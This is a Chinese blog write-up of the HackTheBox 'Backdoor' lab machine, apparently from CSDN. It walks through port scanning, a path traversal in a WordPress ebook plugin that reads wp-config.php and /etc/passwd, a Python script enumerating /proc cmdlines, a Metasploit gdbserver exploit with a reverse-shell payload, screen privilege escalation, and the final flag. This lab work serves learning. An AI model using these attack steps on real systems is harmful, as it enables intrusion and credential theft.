HacktheBox靶场之Backdoor 核心提炼

最新推荐文章于 2024-04-27 10:03:28 发布
最新推荐文章于 2024-04-27 10:03:28 发布
阅读量2.1k 收藏 2
点赞数
分类专栏: 靶场与CTF系列 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/124327857
版权

自勉一句话:思维比工具更重要

内网靶场Backdoor

主要方向1:信息搜集(对目标的端口 服务 网站等进行扫描)

nmap普通扫描 端口开放80和22

nmap进行全端口扫描  多出来一个1337

nmap -sS -sC -p- --min-rate=5000 10.10.11.125

 

nmap漏洞模块的扫描:发现后台登录地址 以及用户admin

 这里学习到 一般wordpress的后台登录地址都是域名下的wp-login.php

nikto扫描工具没有发现什么有用的信息

wpscan扫描工具 专门针对wordpress的网站 可以考虑测试一下

wpscan -h  //查看帮助
wpscan --url xxx    //针对目标url进行扫描

这里记录一下 新版python开启web服务的命令有所变化

python -m SimpleHTTPServer
python -m SimpleHTTPServer 8000
python3 -m http.server 8000

通过wpscan工具进行扫描

wpscan --url 10.10.11.125

wpscan发现的有效信息大致如下:

 wpscan也可以用于探测存在的用户名

wpscan --url 10.10.11.125 -e u   //可以用于探测可能存在的用户名

经过尝试可能能够利用的位置就是xmlrpc.php 

这里存在可以利用的漏洞 具体详情可以参考:

https://blog.csdn.net/u012206617/article/details/109002948

但是经过尝试并没有发现可以利用的地方

接下来再尝试使用工具dirsearch进行一下扫描

多尝试尝试一些目录 发现一个可疑目录 /wp-content/plugins/

 尝试wget对一些文件进行下载

 

 最后只成功下载到了一个文件

 然而并没有什么卵用    火大!!!!

查看 readme.txt  发现大致有个玩意版本是1.1

 ebook插件的版本是1.1  尝试searchsploit

 发现poc  可以直接查看到配置文件

10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

 成功下载下来了配置文件

 但是读取到mysql的信息以后并没有什么卵用

之后顺带读取一下/etc/passwd 

回想起刚刚那个 1337端口 在谷歌搜索了一下

地址:

https://www.netspi.com/blog/technical/web-application-penetration-testing/directory-traversal-file-inclusion-proc-file-system/

 根据提示 我们尝试自己写一个脚本去爆破这其中的内容

import requests
url = 'http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/{}/cmdline'
for i in range(0,1000):
    target = url.format(str(i))
    res = requests.get(target).text
    if len(res) > 83:
        print("PID:"+str(i)+"  Content:"+res)

 

PID:852  Content:/proc/852/cmdline/proc/852/cmdline/proc/852/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>window.close()</script>
PID:853  Content:/proc/853/cmdline/proc/853/cmdline/proc/853/cmdline/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done<script>window.close()</script>

这是一个以user运行的gdbserver进程 对应端口是1337 同时还有一个screen

接下来我们直接进入msfconsole 搜索关于gdbserver的漏洞进行利用

use exploit/multi/gdb/gdb_server_exec
set payload linux/x64/meterpreter/reverse_tcp
set RHOSTS 10.10.11.125
set RPORT 1337
set LHOST 10.10.14.118
set target 1

 切记,本机ip要改成靶机能够识别到的地址 否则没办法上线 公网除外

 此时已经成功上线了

 接下来我们尝试suid提权

结合之前DC靶场攻略中有提到到screen的suid提权的方式

友情地址:

https://blog.csdn.net/weixin_51339377/article/details/123541296

 不过这道题并不需要这么麻烦 已经有提示了

PID:853  Content:/proc/853/cmdline/proc/853/cmdline/proc/853/cmdline/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done<script>window.close()</script>

 

 

 成功获得最终的flag

f9ba87f63f631010f56f9b7c0aa07599

 

Simon_Smith
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[Hack The Box]靶机2 Backdoor
Huamang的博客
03-25 3137
nmap先嗦一把,开了22端口、80端口和1337端口 访问是一个wordpress博客网站 wpscan扫一下 版本是5.8.1 再看看网站,这里会跳转backdoor.htb,配置一下hosts echo 10.10.11.125 backdoor.htb >> /etc/hosts 扫一下目录 这里有目录遍历 这里有一个eBook-download的插件 在readme里面看到版本信息,找找看有没有什么漏洞 版本好像是1.1 的确有漏洞,任意文件下载 拿到一个数据库的.
废物的靶场日记 hackthebox-Backdoor
m0_53302733的博客
03-27 1372
废物的靶场日记 hackthebox-Backdoor 今天做的第三台了 把easy难度的active机器先清了 靶机IP 10.10.11.125 前渗透 sudo nmap -sS -sC -p- --min-rate=5000 10.10.11.125 这个nmap怎么变了呢 那必然是一开始![请添加图片描述](https://img-blog.csdnimg.cn/154f72a4e7bd40e387e66b03444bf9c4.png?x-oss-process=image/watermar
探索BackdoorBox:一款强大的后门检测工具
最新发布
gitblog_00025的博客
04-27 621
探索BackdoorBox:一款强大的后门检测工具 项目地址:https://gitcode.com/THUYimingLi/BackdoorBox 在网络安全领域,预防和检测恶意软件后门至关重要。BackdoorBox 是一个开源项目,专门设计用于帮助安全专家和普通用户识别并清除潜在的系统后门。本文将深入探讨该项目的技术原理、应用场景和独特特性,引导您了解并开始使用它。 项目简介 Backdoo...
安全练兵场】| BurpSuite靶场系列之SQL注入
Ms08067安全实验室
10-12 329
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中...
backdoored
底层社会中的弱智
10-09 1916
总结: 目标靶机没有其他开放的端口,确定攻击方向就是1337 http服务端口。 访问页面后给出的flag位置提示,一个在用户文件夹下面还有root用户下面root.txt文件 使用提权的时候利用提权脚本,linpeas.sh+gtf进行搜索,找到tac命令进行提权。 直接访问/root/root.txt 获取最后的flag的值。 靶机评级:简单 需要一个好字典进行爆破 使用nmap 针对主机进行端口探测 仅出现1337端口为http服务 Nikto没有探测出信息 访问13
builtin_hack_backdoor_
09-30
backdoor for netgear routers. Can use to hack everyone
backdoor-factory
05-25
《Backdoor Factory:深入理解与安全应用》 Backdoor Factory,这个名字听起来可能让一些人感到不安,但实际上,它是一款专为安全测试而设计的工具。这个工具的主要功能是生成win32PE后门测试程序和ELF(Executable...
Shells_shell_backdoor_ShellChecker_
10-02
BHH Shell Checker VULNERABILITY OF SITES
wso2.5.1.rar_Everything and More_backdoor
09-22
WSO is a PHP shell backdoor that provide an interface for various remote operations. It can perform everything from remote code execution, bruteforcing of servers, provide server information, and more...
工具介绍-the-backdoor-factory(第九课).docx
09-15
工具介绍 - The Backdoor Factory(第九课) The Backdoor Factory 是一个功能强大的工具,用于生成后门Payload,并将其植入到可执行文件中。下面是对该工具的详细介绍和知识点总结。 什么是 The Backdoor Factory...
<DeepPayload(DeepBackDoor): Black-box Backdoor Attack on Deep Learning Models >阅读笔
Yale的博客
02-02 910
Abstract 在本文中,我们介绍了一种带有针对已编译的深度学习模型的一系列逆向工程技术的高效的黑盒攻击手段。攻击的核心是使用trigger detector和一些operators来构建出的neural conditional branch,将其注入到victim model作为malicious payload。因为conditional logic可以被攻击者灵活定制,这种攻击是有效的,而且也是可扩展的,因为它不要求原模型的任何先验知识。我们使用5个先进的深度学习框架以及从真实世界收集的样本评估了其
hackthebox-bankrobber(考点:xss/xsrf/端口转发/缓冲区溢出)
冬萍子癸水
04-18 680
nmap PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4) | http-methods: |_ Supported Methods: HEAD POST |_http-server-header: Apac...
靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE
OneMoreThink
01-12 955
打靶思路资产发现主机发现服务发现漏洞发现(获取权限)irc服务提升权限server用户sudosuidcron内核提权信息收集1、资产发现1.1、主机发现本次靶场SUNSET: NOONTIDE[1]指定IP,不涉及主机发现过程。1.2、服务发现使用命令sudo -u root 172.16.33.78 -n -Pn -p- --reason -sV -sC -O,发现主机开放的端口、提供的服务、...
利用weevely生成php后门木马
qq_28147861的博客
01-18 3639
Weevely工具介绍 weevely 是一款具有高隐蔽性的针对PHP 平台的Web shell。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透。下面是weevely的主要功能: (1)它有30多种可完成自动管理渗透后期任务的功能模块。这些模块能够:执行命令和浏览远程文件系统;检测常见的服务器配置问题;创造TCP shell和reverse shell;在被测主机上安装HTTP代理;利用目标主机进行端口扫描。 (2)使用HTTP Cook
红日靶场(一)
qq_58091216的博客
05-01 3081
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
02-breakout靶机实验实战演练
lianliandad的博客
11-10 896
好好好好
hackthebox 我的第一次
Ms08067安全实验室
12-23 1055
本文作者:time(Ms08067内网安全小组成员)time微信(欢迎骚扰交流):这是我第一次玩 hackthebox,就找个尽量简单点的,拿到ip先简单扫一扫那肯定只有80开始点击一看...
php漏洞靶场,CTF靶场训练-目遍历漏洞
weixin_32557949的博客
03-23 336
Background路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过槽中带有“点-斜线(..)” 序列及其变化的文件或使用绝对文件路径来应用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置或关键系统文件。 这种攻击也称为“点-点斜线”、 “目录遍历”、 “目录爬升” 和 “回溯” 。实验环境攻击机 kali linux : 10.0.2...
attack of the tails: yes, you really can backdoor federated learning
08-07
在“尾数攻击:是的,你真的可以后门联合学习”这个问题中,尾数攻击是指通过篡改联合学习模型中的尾部数据,来影响模型的训练结果以达到攻击的目的。 联合学习是一种保护用户隐私的分布式学习方法,它允许设备在不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值